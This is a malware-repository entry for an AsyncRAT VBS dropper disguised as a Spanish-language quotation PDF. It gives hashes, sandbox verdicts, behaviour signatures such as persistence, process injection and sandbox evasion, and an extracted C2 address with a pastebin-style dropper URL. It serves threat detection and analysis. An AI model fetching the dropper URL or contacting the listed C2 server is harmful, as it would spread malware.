MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


AsyncRAT


Vendor detections: 9


Intelligence 9 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
SHA3-384 hash: 29cff8fd5a604084ceaf94bd16e09ff6aaca32e63117648bee14ce76cd1d7f3ead491740fb250430294957f8223d51d6
SHA1 hash: 4c632c11036d0eec042d9eddb2b351ae2ed3caf4
MD5 hash: 60ec698e60d2fb823393bc2ee1664742
humanhash: chicken-nebraska-kentucky-arizona
File name:COTIZACIÓN_23-5_Pdf.vbs
Download: download sample
Signature AsyncRAT
Create hunting rule
File size:8'938'658 bytes
First seen:2025-03-31 17:28:18 UTC
Last seen:Never
File type:Visual Basic Script (vbs) vbs
MIME type:text/plain
ssdeep 96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve
Threatray 477 similar samples on MalwareBazaar
TLSH T1B196A4E9B3FC7B59F6F36A0B687953490E7F3E9A627E816C101166140FB2E108D74362
TrID 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1)
33.3% (.MP3) MP3 audio (1000/1)
Magika unknown
Reporter abuse_ch
Tags:AsyncRAT vbs

Intelligence

File Origin
# of uploads :
1
# of downloads :
69
Origin country :
NL NL
Vendor Threat Intelligence
Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=67ead443855e5ec5240af1b4
Tags:
autorun dropper shell sage
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
Result
Threat name:
AsyncRAT
Create hunting rule
Detection:
malicious
Classification:
spre.troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1653085
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Paste sharing url in reverse order
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected Generic Downloader
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1653085 Sample: COTIZACI#U00d3N_23-5_Pdf.vbs Startdate: 31/03/2025 Architecture: WINDOWS Score: 100 86 paste.ee 2->86 88 textbin.net 2->88 90 bg.microsoft.map.fastly.net 2->90 100 Suricata IDS alerts for network traffic 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 Multi AV Scanner detection for submitted file 2->104 108 20 other signatures 2->108 11 wscript.exe 1 2->11         started        14 powershell.exe 11 2->14         started        16 powershell.exe 2->16         started        18 2 other processes 2->18 signatures3 106 Connects to a pastebin service (likely for C&C) 86->106 process4 dnsIp5 134 Suspicious powershell command line found 11->134 136 Wscript starts Powershell (via cmd or directly) 11->136 138 Uses schtasks.exe or at.exe to add and modify task schedules 11->138 142 2 other signatures 11->142 21 powershell.exe 7 11->21         started        24 schtasks.exe 1 11->24         started        26 schtasks.exe 1 11->26         started        28 wscript.exe 14->28         started        30 conhost.exe 14->30         started        32 wscript.exe 16->32         started        34 conhost.exe 16->34         started        92 127.0.0.1 unknown unknown 18->92 140 Wscript called in batch mode (surpress errors) 18->140 36 conhost.exe 18->36         started        38 wscript.exe 18->38         started        signatures6 process7 signatures8 114 Suspicious powershell command line found 21->114 116 Encrypted powershell cmdline option found 21->116 118 Bypasses PowerShell execution policy 21->118 122 2 other signatures 21->122 40 powershell.exe 14 19 21->40         started        45 conhost.exe 21->45         started        47 conhost.exe 24->47         started        49 conhost.exe 26->49         started        120 Wscript starts Powershell (via cmd or directly) 28->120 51 powershell.exe 28->51         started        53 powershell.exe 32->53         started        process9 dnsIp10 94 textbin.net 104.21.112.1, 443, 49687, 49690 CLOUDFLARENETUS United States 40->94 96 paste.ee 23.186.113.60, 443, 49688, 49691 KLAYER-GLOBALNL Reserved 40->96 84 C:\Users\user\AppData\Local\Temp\dll03.ps1, Unicode 40->84 dropped 130 Potential dropper URLs found in powershell memory 40->130 55 powershell.exe 15 40->55         started        132 Wscript called in batch mode (surpress errors) 51->132 59 conhost.exe 51->59         started        61 wscript.exe 51->61         started        63 conhost.exe 53->63         started        65 wscript.exe 53->65         started        file11 signatures12 process13 file14 80 __________________...________-------.lnk, MS 55->80 dropped 82 C:\Users\user\AppData\Local\Temp\xx2.vbs, ASCII 55->82 dropped 124 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 55->124 126 Writes to foreign memory regions 55->126 128 Injects a PE file into a foreign processes 55->128 67 powershell.exe 23 55->67         started        70 MSBuild.exe 55->70         started        72 MSBuild.exe 55->72         started        75 2 other processes 55->75 signatures15 process16 dnsIp17 110 Loading BitLocker PowerShell Module 67->110 77 powershell.exe 1 11 67->77         started        112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 70->112 98 196.251.89.167, 49697, 49703, 6900 Web4AfricaZA Seychelles 72->98 signatures18 process19 signatures20 144 Creates autostart registry keys with suspicious values (likely registry only malware) 77->144 146 Creates autostart registry keys with suspicious names 77->146
Score:
79%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1/
Threat name:
Script.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-03-31 14:03:52 UTC
File Type:
Text (VBS)
AV detection:
5 of 24 (20.83%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=dg4zol4xbsrapt4esrmcxx4mnc4kd6olxsni34avduc4e3fzwoqq._file
Verdict:
malicious
Label(s):
asyncrat
Create hunting rule
Similar samples:
17dd3793d4bbf9e90e53df26678489a7b82e65d1eeecf396eb088b444a164f85
AsyncRAT
3df5b2d8fa12771d01180865d86b83385535794b18232cca17e5a7e3fac585fb
AsyncRAT
4b02692bf468a164e333bbfc961c5974d0a95009a72ea8bff2e9cb677eae4f56
AsyncRAT
79d7b0f170471f44ed6c07ddb4c4c9bb20c97235aef23ac052e692cb558a156d
AsyncRAT
84c2b21f5b3c48dfb7481094b8e7f8c2f56e041fe3244b1a608bc264d83536bb
AsyncRAT
e4ac57a8885a3f67ef865619fe1002547a993e4e5fd14e2f6ac89c6f741b2107
AsyncRAT
ecc6b2506aeaac13da0562a6a5d35c802eea9c6232c49cc4583d7c5c13bbbc0f
AsyncRAT
error
AsyncRAT
+ 467 additional samples on MalwareBazaar
Result
Malware family:
asyncrat
Create hunting rule
Score:
  10/10
Tags:
family:asyncrat botnet:default defense_evasion discovery execution persistence rat
Link:
https://tria.ge/reports/250331-v2lgvaxjt3/
Behaviour
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Adds Run key to start application
Hide Artifacts: Hidden Window
Checks computer location settings
Drops startup file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
AsyncRat
Asyncrat family
Malware Config
C2 Extraction:
196.251.89.167:6900
Dropper Extraction:
https://textbin.net/raw/ezjmofz3s6
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments